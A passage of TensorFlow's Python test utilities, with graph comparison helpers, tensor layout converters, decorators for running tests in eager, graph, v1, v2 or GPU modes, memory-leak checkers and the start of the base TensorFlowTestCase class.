"Expected tf.GraphDef for actual, got %s" % type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for expected, got %s" % type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def IsMklEnabled():
return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
fn(*args, **kwargs)
return wrapper
return real_skip_if
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def assert_no_new_pyobjects_executing_eagerly(f):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
"""
def decorator(self, **kwargs):
"""Warms up, gets an object count, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various versions
# of python2.7.x.
for _ in range(2):
f(self, **kwargs)
gc.collect()
previous_count = len(gc.get_objects())
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, **kwargs)
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
new_count = len(gc.get_objects())
# In some cases (specifacally on MacOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert new_count <= previous_count, (
"new_count(%d) is not less than or equal to previous_count(%d)" %
(new_count, previous_count))
gc.enable()
return decorator
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
f(self, **kwargs)
else:
f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, blacklist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(blacklist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in blacklist:
if b is obj:
return "<test code>"
if obj is blacklist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, blacklist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
blacklist: same as blacklist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, blacklist):
return "{}{}".format(get_ignore_reason(obj, blacklist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, blacklist):
"""Builds a reference graph as <referrer> -> <list of refferents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
blacklist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
blacklist = blacklist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, blacklist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, blacklist)
reprs[r_id] = describe(r, blacklist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_distribution_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]`
or `option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
if not kwargs:
return [OrderedDict()]
sort_by_key = lambda k: k[0][0]
kwargs = OrderedDict(sorted(kwargs.items(), key=sort_by_key))
first = list(kwargs.items())[0]
rest = dict(list(kwargs.items())[1:])
rest_combined = _combine_named_parameters(**rest)
key = first[0]
values = first[1]
if not isinstance(values, list):
values = [values]
combinations = [
OrderedDict(sorted(list(combined.items()) + [(key, v)], key=sort_by_key))
for v in values
for combined in rest_combined
]
return combinations
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is a required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]`
or `option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)), "".join(
filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) + [("testcase_name",
"_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not (name.startswith("testSkipEager")
or name.startswith("test_skip_eager"))):
setattr(cls, name, base_decorator(value))
return cls
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
reset_test=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the
session when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
reset_test: If True, tearDown and SetUp the test case between the two
executions of the test (once with and once without eager execution).
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
if reset_test:
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return decorated
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.get_default_graph()._building_function:
return f(*args, **kwds)
tensor_args, tensor_indices = zip(
*[(x, i) for i, x in enumerate(args)
if isinstance(x, (ops.Tensor, variables.Variable))])
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
"""
def decorated(*args, **kwds):
with context.eager_mode():
# Running in eager mode
f(*args, **kwds)
defun_f = def_function.function(f)
defun_f(*args, **kwds)
return decorated
def run_deprecated_v1(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that have
not been updated to a style that is compatible with both TensorFlow 1.x and
2.x. When this decorated is applied, the test body will be run in
an environment where API calls construct graphs instead of executing eagerly.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_deprecated_v1` only supports test methods.")
def decorated(self, *args, **kwargs):
if tf2.enabled():
with context.graph_mode():
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only comptaible in v2")
f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the precense
of a GPU. If a GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the precense
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(
local_device.physical_device_desc) >=
min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
Since the feed_dict is empty when not using placeholders we should be able to
call self.evaluate(), however this requires rewriting the test case.
This class shold be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evalaute `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run().
"""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable the logging for OutOfRangeError, which makes the output
# of tf.data tests hard to read, because OutOfRangeError is used as the
# signal completion
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Avoiding calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
